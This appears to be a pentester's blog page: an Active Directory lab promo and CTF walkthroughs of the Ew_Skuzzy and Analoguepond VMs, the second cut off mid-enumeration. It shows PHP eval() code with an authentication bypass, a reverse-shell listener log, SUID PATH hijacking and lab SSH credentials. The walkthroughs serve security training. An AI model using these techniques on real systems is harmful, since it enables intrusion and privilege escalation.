
Offshore – A Windows Active Directory Pentesting Lab

Intro

In August ch4p from Hack the Box approached me with an offer to build a CTF for the annual Greek capture the flag event called Panoptis. The idea was to build a unique Active Directory lab environment to challenge CTF competitors by exposing them to a simulated real-world penetration test (pretty rare for a CTF). I spent a bit over a month building the first iteration of the lab and thus Offshore was born.

I flew to Athens, Greece for a week to provide on-site support during the lab. Overall the CTF lab was a hit and very well received by the competitors and others involved with the event.

Afterwards, ch4p offered for me to further build out the lab and eventually offer it as a Pro Lab on the main Hack the Box website. I spent another 3 or so months refining elements within the lab, increasing the overall size and difficulty and causing ch4p a lot of stress by asking for more and more storage, ram and virtual networks.

I spent countless hours with the goal of building a realistic Active Directory based lab that had the feel of a real-world corporate environment made up of many things I have seen during internal/external penetration testing engagements over the years. My goal was to produce a lab that would be accessible and achievable by junior penetration testers, help mid-level folks improve their skills and even provide a bit of a challenge to seasoned veterans. The lab also serves as a test bed to try out many common and obscure AD attacks that you may read about but either never encounter during a real-world engagement or do not have the proper testing environment to practice and refine the techniques.

The lab went live on September 1, 2018 and has been a hit so far. Of course there were a few issues I had to hammer out after go-live and some lessons learned, but overall it has been a success. This project has been an exciting and humbling experience. I learned a ton while building this and configuring many of the attacks. So far feedback has been positive.

Anyway, let's get into a description of the lab.

Description

You are an agent tasked with exposing money laundering operations in an offshore international bank. Breach the DMZ and pivot through the internal network to locate the bank’s protected databases and a shocking list of international clients. OFFSHORE is designed to simulate a real-world penetration test, starting from an external position on the internet and gaining a foothold inside a simulated corporate Windows Active Directory network. Users will have to pivot and jump across trust boundaries to complete the lab. This lab is intended to expose participants to:

  • Web application attacks
  • Enumeration
  • Exploitation of common and obscure real-world Active Directory flaws
  • Local privilege escalation
  • Lateral movement and crossing trust boundaries
  • Evading endpoint protections
  • Reverse engineering
  • Out-of-the-box thinking

Players will have the opportunity to attack 16 hosts of various operating system types and versions to obtain 29 flags across a realistic Active Directory lab environment with various standalone challenges hidden throughout. The Active Directory lab simulates the look and feel of a real-world corporate network complete with very active simulated users and other elements of a busy enterprise. The lab is designed to start out relatively easy and progress in difficulty throughout.

Users will start from an external perspective and have to penetrate the “DMZ” and then move laterally through the CORP.LOCAL, DEV, ADMIN and CLIENT forests to complete the lab.

Target Audience

I designed Offshore to appeal to a wide variety of users, everyone from junior-level penetration testers to seasoned testers, as well as infosec hobbyists and even blue teamers; there is something for everyone. I can pretty much guarantee you will pick up at least a few new tricks which can be immediately applied to your real-world engagements or taken back to your organization to help improve the overall security posture.

Pricing

Please reach out for pricing. Tickets are available for 30, 60, or 90 days of access for individuals. Corporate pricing is also available for larger groups.

Additional Information

Offshore is hosted in conjunction with Hack the Box (https://www.hackthebox.eu). Participants will receive a VPN key to connect directly to the lab.

Once connected to VPN, the entry point for the lab is 10.10.110.0/24. *Note* The firewall at 10.10.110.3 is out of scope.

If you have questions or would like to learn more about the lab, feel free to contact me on Twitter or on Mattermost. Participants in the lab will have access to a private Offshore channel on the Netsecfocus Mattermost (https://chat.netsecfocus.com/join).

Ew_Skuzzy:1 vulnhub walkthrough

It’s been a while since I’ve had the time to take on a VM over at vulnhub or put together a walkthrough. Building my own challenges, studying for the OSCE, work, and family took all of my time.

I finally had some free time so I checked out the latest slew of releases. Ew_Skuzzy had been up for a few days without any walkthroughs so it looked like a good challenge.

You can grab the VM here: https://www.vulnhub.com/entry/ew_skuzzy-1,184/

The readme has a note that VMware users may have issues. If you use VMware workstation like I do (or player) these steps will get you up and running.

I first attached a CD-rom to the VM and added a Gparted ISO, selected boot to firmware and changed the boot order in BIOS to boot from the ISO. Once Gparted loaded I was able to mount the file system and make a few changes with the following steps within a terminal window:

	1) sudo su
	2) mount /dev/sda1 /mnt
	3) vim /mnt/etc/network/interfaces and change the interface to 'eth0'
	4) vim /mnt/etc/default/grub and edit the line
	   GRUB_CMDLINE_LINUX="" to read:
	   GRUB_CMDLINE_LINUX="net.ifnames=0 biosdevname=0"
	5) poweroff
	6) Swap the Gparted ISO for an Ubuntu server ISO, follow the same steps to boot from the CD and once the installer menu loads choose "rescue a broken system" to boot into rescue mode.
	7) Follow all the prompts until arriving at the screen that allows you to execute a shell on /dev/sda1.
	8) In this shell type "update-grub" then type "exit"
	9) Select "execute a shell in the installer environment", then "poweroff"
	10) Remove the CD from the VM, boot to firmware and change the boot order back to the HDD. Once the VM boots up it should grab a lease from DHCP and be fully discoverable from your attacking machine.

Once that was done I fired up the VM and got to work. The creator was nice enough to post the IP for us:

I started off with an nmap scan of all ports, which showed SSH, nginx on port 80 and an iSCSI service listening on port 3260.

root@kali:~# nmap -sV -p- -T4 192.168.85.146 

Starting Nmap 6.46 ( http://nmap.org ) at 2017-03-21 13:09 EDT
Stats: 0:00:01 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Nmap scan report for 192.168.85.146
Host is up (0.00023s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     (protocol 2.0)
80/tcp   open  http    nginx
3260/tcp open  iscsi?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.46%I=7%D=3/21%Time=58D15E6E%P=i686-pc-linux-gnu%r(NULL,2
SF:9,"SSH-2\.0-OpenSSH_7\.2p2\x20Ubuntu-4ubuntu2\.1\r\n");
MAC Address: 00:0C:29:C8:3D:31 (VMware)

I ran dirb for a bit and came up with several trolls:

The page source of the above page had a base64 encoded comment in the HTML:

Sadly not our first flag:

root@kali:~# echo SGVsbG8sIGlzIGl0IGZsYWdzIHlvdSdyZSBsb29raW5nIGZvcj8KSSBjYW4gc2VlIGl0IGluIHlvdXIgZXllcwpJIGNhbiBzZWUgaXQgaW4geW91ciBzbWlsZQpGbGFncyBhcmUgYWxsIEkndmUgZXZlciB3YW50ZWQgYW5kIG15IHBvcnRzIGFyZSBvcGVuIHdpZGUgCkNhdXNlIHlvdSBrbm93IGp1c3Qgd2hhdCB0byBzYXkgYW5kIHlvdSBrbm93IGp1c3Qgd2hhdCB0byBkbwpBbmQgSSB3YW50IHRvIHRlbGwgeW91IHNvIG11Y2gsIG5vIGZsYWdzIGZvciB5b3UuLi4K | base64 -d
Hello, is it flags you're looking for?
I can see it in your eyes
I can see it in your smile
Flags are all I've ever wanted and my ports are open wide 
Cause you know just what to say and you know just what to do

And I want to tell you so much, no flags for you...

This was my first time dealing with an iSCSI service, so I found this link very helpful: https://www.pentestpartners.com/blog/an-interesting-route-to-domain-admin-iscsi/

My first step was to download and install open-iscsi. I was using an older Kali1 VM for this so it was easier to just manually grab and install the .deb from here: https://packages.debian.org/jessie/i386/open-iscsi/download

root@kali:~# dpkg -i open-iscsi_2.0.873+git0.3b4b4500-8+deb8u2_i386.deb

I next ran some discovery with iscsiadm:

root@kali:~# iscsiadm -m discovery -t st -p 192.168.85.146:3260
192.168.85.146:3260,1 iqn.2017-02.local.skuzzy:storage.sys0

Next I used iscsiadm to connect to the target:

root@kali:~# iscsiadm -m node -p 192.168.85.146 --login --target iqn.2017-02.local.skuzzy:storage.sys0
Logging in to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal: 192.168.85.146,3260] (multiple)
Login to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal: 192.168.85.146,3260] successful.

fdisk showed me that I now had an additional drive (/dev/sdb):

root@kali:~# fdisk -l

Disk /dev/sda: 21.5 GB, 21474836480 bytes
255 heads, 63 sectors/track, 2610 cylinders, total 41943040 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x000d28c9

   Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *        2048    40136703    20067328   83  Linux
/dev/sda2        40138750    41940991      901121    5  Extended
/dev/sda5        40138752    41940991      901120   82  Linux swap / Solaris

Disk /dev/sdb: 1073 MB, 1073741824 bytes
34 heads, 61 sectors/track, 1011 cylinders, total 2097152 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x00000000

Disk /dev/sdb doesn't contain a valid partition table

I next mounted the file system and found the first flag along with a floppy disk image:

root@kali:~# mount /dev/sdb /mnt/skuzzy/
root@kali:~# cd /mnt/skuzzy/
root@kali:/mnt/skuzzy# ls
bobsdisk.dsk  flag1.txt  lost+found
root@kali:/mnt/skuzzy# cat flag1.txt 
Congratulations! You've discovered the first flag!

flag1{c0abc15976b98a478150c900ebb0c86f0327f4dd}

Let's see how you go with the next one...

The floppy can be mounted with the following commands:

root@kali:/mnt/skuzzy# losetup /dev/loop0 /mnt/skuzzy/bobsdisk.dsk 

root@kali:/mnt# mkdir /mnt/floppy
root@kali:/mnt# mount /dev/loop0 -o loop /mnt/floppy
root@kali:/mnt# ls
floppy  hgfs  skuzzy
root@kali:/mnt# cd floppy/
root@kali:/mnt/floppy# ls
lost+found  ToAlice.csv.enc  ToAlice.eml

An email to Alice gave me flag #2 as well as several clues for how to decrypt the encrypted .csv file:

root@kali:/mnt/floppy# cat ToAlice.eml 
G'day Alice,

You know what really annoys me? How you and I ended up being used, like some kind of guinea pigs, by the RSA crypto wonks as actors in their designs for public key crypto... I don't recall ever being asked if that was ok? I never got even one cent of royalties from them!? RSA have made Millions on our backs, and it's time we took a stand!

Starting now, today, immediately, I'm never using asymmetric key encryption again, and it's all symmetric keys from here on out. All my files and documents will be encrypted with that popular symmetric crypto algorithm. Uh. Yeah, I can't pronounce its original name. I don't even know what the letters in its other name stand for - but really - that's not important. A bloke at my local hackerspace says its the beez kneez, ridgy-didge, real-deal, the best there is when it comes to symmetric key crypto, he has heaps of stickers on his laptop so I guess it means he knows, right? Anyway, he said it won some big important competition among crypto geeks in October 2000? Lucky Y2K didn't happen then, I suppose or that would have been one boring party!

Anyway this algorithm sounded good to me. I used the updated version that won the competition.

You know what happened to me this morning? My kids, the little darlings, had spilled their fancy 256 bit Lego kit all over the damn floor. Sigh. Of course I trod on it making my coffee, the level of pain really does ROCKYOU to the core when it happens! It's hard to stay mad though, I really love Lego, the way those blocks chain togeather really does make them work brilliantly. My favourite new Spanish swear came in handy when this happened... supercalifragilisticoespialidoso !

Anyway, given I'm not not using asymmetric crypto any longer, I destroyed my private key, so the public key you have for me may as well be deleted. I've got some notes for you which might help in your current case, I've encrypted it using my new favourite symmetric key crypto algorithm, it should be on the disk with this note. The key is, well, one awesome word I learnt in my recent Spanish classes!

Give me a shout when you're down this way again, we'll catch up for coffee (once the Lego is removed from my foot) 🙂

Cheers,

Bob.

PS: Oh, before I forget, the hacker-kid who told me how to use this new algorithm, said it was very important I used the command option -md sha256 when decrypting. Why? Who knows? He said something about living on the bleeding-edge...

PPS: flag2{054738a5066ff56e0a4fc9eda6418478d23d3a7f}

What stuck out was the following:

  • Competition in October 2000 (AES);
  • 256 bit;
  • “those blocks chain together” (cipher block chaining);
  • The Spanish swear word was likely a key “supercalifragilisticoespialidoso”;
  • An allusion to rockyou (possibly rockyou.txt for brute forcing the passphrase); and
  • Command option -md sha256 (these are openssl command line options).

The intent may have been to brute force the passphrase but it seemed like it had already been given to us, so after a bit of trial and error I was able to decrypt the .csv with the following command, feeding it the passphrase above:

root@kali:/mnt/floppy# openssl enc -d -aes-256-cbc -in ToAlice.csv.enc -out ToAlice.csv -md SHA256
enter aes-256-cbc decryption password:
root@kali:/mnt/floppy# ls
lost+found  ToAlice.csv  ToAlice.csv.enc  ToAlice.eml
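The -md sha256 hint matters because `openssl enc` (without -pbkdf2) turns the passphrase into the AES key and IV with OpenSSL's EVP_BytesToKey routine, and the digest it uses changed from MD5 to SHA-256 in OpenSSL 1.1.0: decrypting with the wrong digest yields a different key and garbage output rather than an error. The following is an added example, not code from the walkthrough or the VM, that parses the "Salted__" header `openssl enc` writes and derives the AES-256-CBC key and IV under both digests using only the standard library; the salt bytes are constructed for illustration, and the passphrase is the one the email points at.

```python
import hashlib

# `openssl enc -salt` (the default) writes: 8-byte magic, 8-byte salt, ciphertext.
MAGIC = b"Salted__"


def split_openssl_file(data):
    """Return (salt, ciphertext) from an `openssl enc` output blob."""
    if len(data) < 16 or data[:8] != MAGIC:
        raise ValueError("not an openssl 'Salted__' file")
    return data[8:16], data[16:]


def evp_bytes_to_key(password, salt, key_len, iv_len, digest="sha256"):
    """OpenSSL EVP_BytesToKey with count=1, as `openssl enc` uses without -pbkdf2.

    D_1 = H(password || salt), D_i = H(D_{i-1} || password || salt); the
    digests are concatenated until key_len + iv_len bytes are available.
    """
    derived = b""
    prev = b""
    while len(derived) < key_len + iv_len:
        prev = hashlib.new(digest, prev + password + salt).digest()
        derived += prev
    return derived[:key_len], derived[key_len:key_len + iv_len]


def aes256cbc_params(password, blob, digest="sha256"):
    """Key and IV that `openssl enc -aes-256-cbc -md <digest>` would use for this file."""
    salt, _ciphertext = split_openssl_file(blob)
    return evp_bytes_to_key(password, salt, key_len=32, iv_len=16, digest=digest)


def digests_disagree(password, blob):
    """True when -md md5 and -md sha256 would feed AES different keys for the same file."""
    return aes256cbc_params(password, blob, "md5") != aes256cbc_params(password, blob, "sha256")


# Constructed sample: a fixed salt and a few placeholder ciphertext bytes, not the
# real ToAlice.csv.enc from the VM.
SAMPLE_SALT = bytes.fromhex("0011223344556677")
SAMPLE_BLOB = MAGIC + SAMPLE_SALT + b"\x00" * 32
PASSPHRASE = b"supercalifragilisticoespialidoso"

if __name__ == "__main__":
    for d in ("md5", "sha256"):
        key, iv = aes256cbc_params(PASSPHRASE, SAMPLE_BLOB, d)
        print(f"-md {d:6}: key={key.hex()} iv={iv.hex()}")
    print("digests disagree:", digests_disagree(PASSPHRASE, SAMPLE_BLOB))
```

With SHA-256 the first digest already covers the whole 32-byte key, so the IV comes from the second round; with MD5 it takes two rounds just to fill the key, which is why the two settings never line up. This is also why EVP_BytesToKey with a single iteration is a weak password-to-key scheme: prefer `-pbkdf2` with a high iteration count when you control the encryption side.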

The .csv gave me flag #3 as well as some new web directories to target:

The first was a troll with some retro Geocities scrolling marquee, nice touch:

The page source again contained a base64 encoded comment which was another troll:

root@kali:~# cat base64.txt | base64 -d
George Costanza: [Soup Nazi gives him a look] Medium turkey chili. 
[instantly moves to the cashier] 
Jerry Seinfeld: Medium crab bisque. 
George Costanza: [looks in his bag and notices no bread in it] I didn't get any bread. 
Jerry Seinfeld: Just forget it. Let it go. 
George Costanza: Um, excuse me, I - I think you forgot my bread. 
Soup Nazi: Bread, $2 extra. 
George Costanza: $2? But everyone in front of me got free bread. 
Soup Nazi: You want bread? 
George Costanza: Yes, please. 
Soup Nazi: $3! 
George Costanza: What? 

Soup Nazi: NO FLAG FOR YOU

The second URL was a sweet custom web app:

The ‘Feed Reader’ page was of particular interest and at first glance looked as though it could be leveraged for either an LFI or RFI, or both!

Browsing to http://192.168.85.146/c2444910794e037ebd8aaf257178c90b/?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt gave me the following:

Browsing directly to the data.txt file gave me the full contents which would be useful later:

I checked the troll image exif data for any clues but there was nothing to be had.

I next turned my attention to the ‘p’ parameter to see if I could get something going. Using the technique discussed in this post https://diablohorn.com/2010/01/16/interesting-local-file-inclusion-method/ I was able to leverage an LFI to pull out the base64 encoded source of each of the PHP pages. I also ran this to try to read files such as /etc/passwd but there were some blocks in place.

Index.php

Flag.php gave me the 4th flag as well as a clue that this flag would come in handy at some point:

The contents of reader.php was particularly interesting:

<?php
defined ('VIAINDEX') or die('Ooooh! So close..');
?>
<h1>Feed Reader</h1>
<?php
if(isset($_GET['url'])) {
    $url = $_GET['url'];
} else {
    print("<a href=\"?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt\">Load Feed</a>");
}

if(isset($url) && strlen($url) != '') {

    // Setup some variables.
    $secretok = false;
    $keyneeded = true;

    // Localhost as a source doesn't need to use the key.
    if(preg_match("#^http://127.0.0.1#", $url)) {
        $keyneeded = false;
        $secretok = true;
    }

    // Handle the key validation when it's needed.
    if($keyneeded) {
        $key = $_GET['key'];
        if(is_array($key)) {
            die("Array trick is mitigated ;)");
        }
        if(isset($key) && strlen($key) == '47') {
            $hashedkey = hash('sha256', $key);
            $secret = "5ccd0dbdeefbee078b88a6e52db8c1caa8dd8315f227fe1e6aee6bcb6db63656";

            // If you can use the following code for a timing attack
            // then good luck 🙂 But.. You have the source anyway, right? 🙂 
            if(strcmp($hashedkey, $secret) == 0) {
                $secretok = true;
            } else {
                die("Sorry... Authentication failed. Key was invalid.");
            }

        } else {
            die("Authentication invalid. You might need a key.");
        }
    }

    // Just to make sure the above key check was passed.
    if(!$secretok) {
        die("Something went wrong with the authentication process");
    }

    // Now load the contents of the file we are reading, and parse
    // the super awesomeness of its contents!
    $f = file_get_contents($url);

    $text = preg_split("/##text##/s", $f);

    if(isset($text['1']) && strlen($text['1']) > 0) {
        print($text['1']);
    }

    print "<br /><br />";

    $php = preg_split("/##php##/s", $f);

    if(isset($php['1']) && strlen($php['1']) > 0) { 
        eval($php['1']);
        // "If Eval is the answer, you're asking the wrong question!" - SG
        // It hurts me to write insecure code like this, but it is in the
        // name of education, and FUN, so I'll let it slide this time.
    }
}

A check was being made to make sure that the file being served was from the localhost; otherwise a key value was needed. The key had to be a 47-character string, passed as a GET parameter, whose sha256 hash matched the hardcoded $secret. Hm, flag 4 is exactly 47 characters. The sha256 of flag 4 checked out perfectly against the $secret variable in the source:

root@kali:/var/www# echo -n flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b} | sha256sum
5ccd0dbdeefbee078b88a6e52db8c1caa8dd8315f227fe1e6aee6bcb6db63656 

The PHP would next check the data.txt ##text## section and print it to the screen and evaluate whatever PHP code was in the ##php## section. A quick check showed me that I had command execution.
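The reader.php logic above is a useful teaching case because its authentication is the least of its problems: the localhost test is a string-prefix regex rather than a hostname comparison, and whatever the check lets through is fed to eval(). The following is an added Python example, not code from the VM or the walkthrough, that reimplements the same checks the way a defender would write them (exact hostname match on a parsed URL, length-fixed key compared in constant time) and parses the ##text## section without ever executing a ##php## section. The $secret value and flag 4 are taken from the page; the test URLs are constructed.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

# Values from reader.php and flag.php on the page.
SECRET_SHA256 = "5ccd0dbdeefbee078b88a6e52db8c1caa8dd8315f227fe1e6aee6bcb6db63656"
EXPECTED_KEY_LEN = 47


def naive_is_local(url):
    """Mirror of preg_match("#^http://127.0.0.1#", $url): a prefix test, not a host test."""
    return url.startswith("http://127.0.0.1")


def strict_is_local(url):
    """Parse the URL and require the host itself to be 127.0.0.1 on plain http."""
    parts = urlsplit(url)
    return (parts.scheme == "http"
            and parts.hostname == "127.0.0.1"
            and parts.username is None
            and parts.port in (None, 80))


def key_is_valid(key):
    """Fixed-length key whose SHA-256 matches the stored digest, compared in constant time."""
    if not isinstance(key, str) or len(key) != EXPECTED_KEY_LEN:
        return False
    digest = hashlib.sha256(key.encode("utf-8")).hexdigest()
    return hmac.compare_digest(digest, SECRET_SHA256)


def authorize_feed(url, key=None):
    """Return (allowed, reason) following reader.php's flow with the strict checks."""
    if not url:
        return False, "no url"
    if strict_is_local(url):
        return True, "localhost source, no key needed"
    if key_is_valid(key):
        return True, "key accepted"
    return False, "authentication failed"


def extract_text_section(body):
    """Equivalent of preg_split("/##text##/s") and taking element 1; ##php## is never evaluated."""
    parts = body.split("##text##")
    return parts[1] if len(parts) > 1 and parts[1] else ""


# Constructed sample feed in the data.txt format the reader expects.
SAMPLE_FEED = "ignored##text##Hello from the feed##text##trailer##php##echo 'never run';##php##"

if __name__ == "__main__":
    for u in ("http://127.0.0.1/feed", "http://127.0.0.10/feed"):
        print(u, "naive:", naive_is_local(u), "strict:", strict_is_local(u))
    print(authorize_feed("http://example.test/feed", "flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}"))
    print(repr(extract_text_section(SAMPLE_FEED)))
```

Note the difference on `http://127.0.0.10/feed`: the prefix regex accepts it because the string starts with `http://127.0.0.1`, while the parsed hostname does not match. Fixing the origin check does not make eval() of remote content safe; the only real fix is to treat fetched data as data, which is what `extract_text_section` does.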


There are several ways to get a shell; this is what I ended up doing after attempts to obtain a reverse shell with mknod, netcat and other methods did not work. The two steps below could also have been combined into a single command.

I created a tiny shell script with the following PHP command and hosted it on my local Apache server:

I then executed the following two commands to upload the shell script to /tmp and execute it:

Wonderful, a shell!

root@kali:/var/www# nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.85.131] from (UNKNOWN) [192.168.85.146] 51562
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@skuzzy:~/html/c2444910794e037ebd8aaf257178c90b$ ls
ls
data.txt  index.php   party.php   trollface.png
flag.php  parrot.gif  reader.php  welcome.php

The usual enumeration turned up an interesting SUID binary in /opt.

www-data@skuzzy:/$ find / -uid 0 -perm -4000 -type f 2>/dev/null
find / -uid 0 -perm -4000 -type f 2>/dev/null
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/newuidmap
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/sudo
/bin/fusermount
/bin/mount
/bin/su
/bin/ntfs-3g
/bin/ping
/bin/ping6
/bin/umount
/opt/alicebackup

Just running the binary, it appeared to execute the id command before attempting to make an SSH connection:

On a hunch that the id command was not being called with an absolute path, I created a dummy file /tmp/id with the contents “/bin/sh” and modified my PATH variable. If the hunch was right, running the alicebackup binary from /opt while sitting in /tmp would cause the program to call my id shell script instead of the real one, due to the PATH abuse.

I ran the command, fixed up my path variable and it worked. I now had root access and the 5th and final flag:
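The root cause here is a setuid-root program invoking a command by bare name and inheriting the caller's PATH; the fix is to call absolute paths (or reset PATH to a trusted value) before any system()/exec. When auditing a box for this class of bug it helps to have a quick triage aid that pulls printable strings out of a binary and flags ones that look like a well-known utility invoked without a leading slash. The following is an added Python example, not code from the VM or the walkthrough; the sample byte blob is constructed to resemble what such a binary might contain, and the utility list is a heuristic you would tune for your environment.

```python
import string

# Printable ASCII minus control whitespace; space is kept so argument strings survive.
PRINTABLE = set(string.printable.encode("ascii")) - {ord(c) for c in "\t\n\r\x0b\x0c"}

# Utilities commonly shelled out to by helper programs; extend for your estate.
COMMON_UTILS = {"id", "ssh", "scp", "rsync", "tar", "cat", "cp", "rm", "ls",
                "whoami", "mount", "umount", "sh", "bash"}


def extract_strings(blob, min_len=2):
    """Runs of printable bytes, like strings(1) but with a low threshold so 'id' is caught."""
    found, current = [], bytearray()
    for b in blob:
        if b in PRINTABLE:
            current.append(b)
            continue
        if len(current) >= min_len:
            found.append(current.decode("ascii"))
        current = bytearray()
    if len(current) >= min_len:
        found.append(current.decode("ascii"))
    return found


def relative_command_strings(blob):
    """Strings whose first token is a known utility named without an absolute path."""
    hits = []
    for s in extract_strings(blob):
        tokens = s.split()
        if not tokens:
            continue
        first = tokens[0]
        base = first.rsplit("/", 1)[-1]
        if base in COMMON_UTILS and not first.startswith("/"):
            hits.append(s)
    return hits


# Constructed sample: a fake binary image mixing an absolute ssh invocation (fine),
# a bare "id" and a bare "ssh" (both PATH-dependent), and some compiler noise.
SAMPLE_BLOB = (b"\x7fELF\x00\x00id\x00/usr/bin/ssh alice@backup\x00"
               b"ssh alice@backup\x00/bin/sh\x00GCC: (Ubuntu) 5.4\x00")

if __name__ == "__main__":
    for hit in relative_command_strings(SAMPLE_BLOB):
        print("PATH-dependent command string:", repr(hit))
```

A hit is only a lead: the string may be data rather than a command, so confirm by running the binary under strace -f and watching the execve paths. On the hardening side, the same two findings argue for absolute paths plus a sanitised PATH in any setuid helper, and for not making helpers setuid at all when sudo rules or capabilities would do.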

This was a great VM with an interesting twist in the iSCSI angle as well as the combined LFI/RFI. Unique and kept me on my toes. Setting up open-iscsi to interact with the service was not difficult and worth the learning opportunity.

Thanks to @vortexau for putting together this challenge, can’t wait to see the next one!

As always thank you to @g0tmi1k for hosting these challenges and maintaining Vulnhub.


Analoguepond Vulnhub Walkthrough

Just around the time I was learning/experimenting with Puppet in my home lab knightmare asked me to preview a new VM based around some real-world tactics. This was a truly unique and interesting challenge and shows the dangers of leaving a Puppet, Ansible or any other configuration management or package management tool unsecured. As always the VM was ripe with cultural references which kept me on my toes researching both the nuances and the technical pieces. I highly recommend taking it for a spin, you can grab it here: https://www.vulnhub.com/entry/analougepond-1,185/

The README provides some hints for getting going:

Since you're not a Teuchter, I'll offer some hints to you:

Remember TCP is not the only protocol on the Internet
My challenges are never finished with root. I make you work for the flags.
The intended route is NOT to use forensics or 0-days, I will not complain either way.

To consider this VM complete, you need to have obtained:

    Troll Flag: where you normally look for them
    Flag 1: You have it when you book Jennifer tickets to Paris on Pan Am.
    Flag 2: It will include a final challenge to confirm you hit the jackpot.
    Have root everywhere (this will make sense once you're in the VM)
    User passwords
    2 VNC passwords

Best of luck! If you get stuck, eat some EXTRABACON

NB: Please allow 5-10 minutes or so from powering on the VM for background tasks to run before proceeding to attack.

After loading it up and waiting a few minutes I had an IP and was ready to go:

I added an entry to my hosts file to simplify things and started out with an nmap scan of all TCP ports and also a UDP scan of top 1000 ports due to the readme alluding to other protocols in use.

The TCP scan just gave me an SSH port, I didn’t even attempt bruteforcing because I knew knightmare wouldn’t make it that easy.

root@mrb3n:~# nmap -sV -Pn -T4 -p- --open analoguepond

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-12-14 09:39 EST
Stats: 0:10:29 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 39.70% done; ETC: 10:05 (0:15:34 remaining)
Nmap scan report for 192.168.85.128
Host is up (0.0010s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
MAC Address: 00:0C:29:C9:A7:A4 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The UDP scan turned up SNMP, and based on the readme nod towards EXTRABACON (which requires SSH, SNMP and a public SNMP community string) I directed my attention here with snmpwalk.

root@mrb3n:~# nmap -sU --open analoguepond

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-12-14 06:07 EST
Nmap scan report for 192.168.85.128
Host is up (0.00094s latency).
Not shown: 998 closed ports
PORT    STATE         SERVICE
68/udp  open|filtered dhcpc
161/udp open          snmp
MAC Address: 00:0C:29:C9:A7:A4 (VMware)

I’ve truncated the output and just left in the key items:

root@mrb3n:~# snmpwalk analoguepond -c public -v1
iso.3.6.1.2.1.1.1.0 = STRING: "Linux analougepond 3.19.0-77-generic #85~14.04.1-Ubuntu SMP Mon Dec 5 11:19:02 UTC 2016 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (103731) 0:17:17.31
iso.3.6.1.2.1.1.4.0 = STRING: "Eric Burdon <eric@example.com>"
iso.3.6.1.2.1.1.5.0 = STRING: "analougepond"
iso.3.6.1.2.1.1.6.0 = STRING: "There is a house in New Orleans they call it..."
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (16) 0:00:00.16

So based on this it seems pretty certain that ‘eric’ is our username. I would have tried combos such as eric.burdon, eburdon etc. but ‘eric@example.com’ seemed to be nudging me in the right direction. Our hint “There is a house in New Orleans…” could only be “The Rising Sun”, which makes sense because Eric Burdon was the lead vocalist for the band: https://en.wikipedia.org/wiki/The_Animals.

Cranking this up in my headphones as the wife and kid slept I was able to SSH in with the creds eric:therisingsun.

Once in I was dropped into Eric’s home directory and had a couple of images as well as a binary named ‘spin’ which appeared to do just that, throw up a spinning cursor. Not useful…yet. I pulled down the images with SCP and checked for anything tasty in the exif data but came up empty, for now.

eric@analougepond:~$ pwd
/home/eric
eric@analougepond:~$ ls
reticulatingsplines.gif  

root@mrb3n:~# scp eric@analoguepond:/home/eric/reticulatingsplines.gif /var/www/html/
eric@analoguepond's password: 
reticulatingsplines.gif                                                                                                100%   29KB   2.4MB/s   00:00   

Hmm, no clue at this point but I’ll hang onto it, it may prove to be useful.

The readme mentioned VNC passwords, and a netstat showed that VNC was present on the localhost on 5900 and 5901. ifconfig showed a virtual bridge on the 192.168.122.0/24 subnet, so we must be dealing with some libvirt emulation here. The readme also mentions multiple hosts, I am guessing 2 additional ones :).

eric@analougepond:~$ netstat -antp
(No info could be read for "-p": geteuid()=1000 but you should be root.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:5900          0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:5901          0.0.0.0:*               LISTEN      -               
tcp        0      0 192.168.122.1:53        0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0    408 192.168.85.128:22       192.168.85.129:55386    ESTABLISHED -               
tcp6       0      0 :::22                   :::*                    LISTEN
eric@analougepond:~$ ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:c9:a7:a4  
